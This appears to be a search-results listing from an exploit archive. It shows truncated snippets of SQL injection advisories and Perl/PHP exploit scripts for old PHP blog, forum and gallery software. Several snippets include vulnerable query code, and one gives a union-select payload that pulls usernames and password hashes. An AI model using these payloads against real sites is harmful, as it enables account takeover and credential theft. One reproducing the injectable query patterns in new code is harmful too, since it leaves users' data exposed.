122 matches found
mgbs-sql.txt
MGBS 1.0 Remote SQL injection Script url http://sourceforge.net/project/showfiles.php?groupid=193233 Vulnerable code in blog.php ?php $month = $GET'month'; $result = mysqlquery"SELECT FROM blog WHERE posted='$month' ORDER BY id DESC" or die"HELP QUERY BROKEN"; ... Admin hash exploit...
Mooseguy Blog System 1.0 (blog.php month) SQL Injection Vulnerability
No description provided by source. MGBS 1.0 Remote SQL injection Script url http://sourceforge.net/project/showfiles.php?groupid=193233 Vulnerable code in blog.php ?php $month = $GET'month'; $result = mysqlquery"SELECT FROM blog WHERE posted='$month' ORDER BY id DESC" or die"HELP QUERY BROKEN";...
Mooseguy Blog System 1.0 (blog.php month) SQL Injection Vulnerability
Exploit for unknown platform in category web applications ===================================================================== Mooseguy Blog System 1.0 blog.php month SQL Injection Vulnerability ===================================================================== MGBS 1.0 Remote SQL injection...
Mooseguy Blog System 1.0 - month SQL Injection
Mooseguy Blog System 1.0 - month SQL Injection MGBS 1.0 Remote SQL injection Script url http://sourceforge.net/project/showfiles.php?groupid=193233 Vulnerable code in blog.php ?php $month = $GET'month'; $result = mysqlquery"SELECT FROM blog WHERE posted='$month' ORDER BY id DESC" or die"HELP QUER...
Tribisur 2.0 - SQL Injection
!/usr/bin/php -q And now the bugged code :- : So we can exploit it with this simple PoC: forum.php?action=liste&cat=-1+union+select+0,concatpseudo,0x3a,passe,0,0,0,0,0,0,0,0+from+utiliz+where+id=1 Bug 2 in catmain.php : So like the first we can exploit it with:...
zenphoto-sql.txt
!/usr/bin/perl -w Zenphoto 1.1.3 SQL Injection Exploit Discovered by: Silentz Payload: Admin Username & Hash Retrieval Website: http://www.w4ck1ng.com Vulnerable Code rss.php: $albumnr = $GETalbumnr; if $albumnr != "" $sql = "SELECT FROM ". prefix"images" ." WHERE albumid = $albumnr AND show = 1...
ZenPhoto 1.1.3 - rss.php?albumnr SQL Injection
ZenPhoto 1.1.3 - rss.php?albumnr SQL Injection !/usr/bin/perl -w Zenphoto 1.1.3 SQL Injection Exploit Discovered by: Silentz Payload: Admin Username & Hash Retrieval Website: http://www.w4ck1ng.com Vulnerable Code rss.php: $albumnr = $GETalbumnr; if $albumnr != "" $sql = "SELECT FROM "...
rpginferno-sql.txt
--==+================================================================================+==-- --==+ RPG Inferno v2.4 SQL Injection Vulnerability +==-- --==+================================================================================+==-- AUTHOR: t0pP8uZz & xprog SITE:...
vBulletin Mod RPG Inferno 2.4 (inferno.php) SQL Injection Vulnerability
Exploit for unknown platform in category web applications ======================================================================= vBulletin Mod RPG Inferno 2.4 inferno.php SQL Injection Vulnerability =======================================================================...
vBulletin Mod RPG Inferno 2.4 - inferno.php SQL Injection
vBulletin Mod RPG Inferno 2.4 - inferno.php SQL Injection --==+================================================================================+==-- --==+ RPG Inferno v2.4 SQL Injection Vulnerability +==-- --==+================================================================================+==--...
vBulletin Mod RPG Inferno 2.4 - 'inferno.php' SQL Injection
--==+================================================================================+==-- --==+ RPG Inferno v2.4 SQL Injection Vulnerability +==-- --==+================================================================================+==-- AUTHOR: t0pP8uZz & xprog SITE:...
Fuzzylime Forum 1.0 - low.php?topic SQL Injection
Fuzzylime Forum 1.0 - low.php?topic SQL Injection !/usr/bin/perl -w Fuzzylime Forum 1.0 SQL Injection Exploit Discovered by: Silentz Payload: Admin Username & Hash Retrieval Website: http://www.w4ck1ng.com Vulnerable Code low.php: $gettopicid = mysqlquery"SELECT FROM $tableprefixthreads WHERE...
Fuzzylime Forum 1.0 - 'low.php?topic' SQL Injection
!/usr/bin/perl -w Fuzzylime Forum 1.0 SQL Injection Exploit Discovered by: Silentz Payload: Admin Username & Hash Retrieval Website: http://www.w4ck1ng.com Vulnerable Code low.php: $gettopicid = mysqlquery"SELECT FROM $tableprefixthreads WHERE threadid='$GETtopic'"; PoC:...
comicsense02-sql.txt
!/usr/bin/perl -w ComicSense 0.2 SQL Injection Exploit Discovered by: s0cratex Payload: Admin Username & Hash Retrieval Website: http://www.w4ck1ng.com Original Advisory: http://seclists.org/bugtraq/2007/Jun/0063.html http://milw0rm.com/exploits/4035 Vulnerable Code index.php: $sqlQuery = "SELECT...
eqdkp-sql.txt
!/usr/bin/perl -w EQdkp = 1.3.2 SQL Injection Exploit Discovered by: Silentz Payload: Admin Username & Hash Retrieval Website: http://www.w4ck1ng.com Vulnerable Code listmembers.php: $sql = 'SELECT m., m.memberearned-m.memberspent+m.memberadjustment AS membercurrent, memberstatus, r.rankname,...
Comicsense 0.2 (index.php epi) Remote SQL Injection Exploit
Exploit for unknown platform in category web applications =========================================================== Comicsense 0.2 index.php epi Remote SQL Injection Exploit =========================================================== !/usr/bin/perl -w ComicSense 0.2 SQL Injection Exploit...
revokebb-sql.txt
!/usr/bin/php -q -d shortopentag=on Thanks to rgod for the php code and Marty for the Love ------------------------------------------------------------- "; if $argc 126 $result.=" ."; else $result.=" ".$string$i; if strlendechexord$string$i==2 $exa.=" ".dechexord$string$i; else $exa.="...
Comicsense 0.2 - 'index.php?epi' SQL Injection (2)
!/usr/bin/perl -w ComicSense 0.2 SQL Injection Exploit Discovered by: s0cratex Payload: Admin Username & Hash Retrieval Website: http://www.w4ck1ng.com Original Advisory: http://seclists.org/bugtraq/2007/Jun/0063.html http://milw0rm.com/exploits/4035 Vulnerable Code index.php: $sqlQuery = "SELECT...
EQdkp 1.3.2 - listmembers.php SQL Injection
EQdkp 1.3.2 - listmembers.php SQL Injection !/usr/bin/perl -w EQdkp = 1.3.2 SQL Injection Exploit Discovered by: Silentz Payload: Admin Username & Hash Retrieval Website: http://www.w4ck1ng.com Vulnerable Code listmembers.php: $sql = 'SELECT m., m.memberearned-m.memberspent+m.memberadjustment AS...
EQdkp 1.3.2 - 'listmembers.php' SQL Injection
!/usr/bin/perl -w EQdkp = 1.3.2 SQL Injection Exploit Discovered by: Silentz Payload: Admin Username & Hash Retrieval Website: http://www.w4ck1ng.com Vulnerable Code listmembers.php: $sql = 'SELECT m., m.memberearned-m.memberspent+m.memberadjustment AS membercurrent, memberstatus, r.rankname,...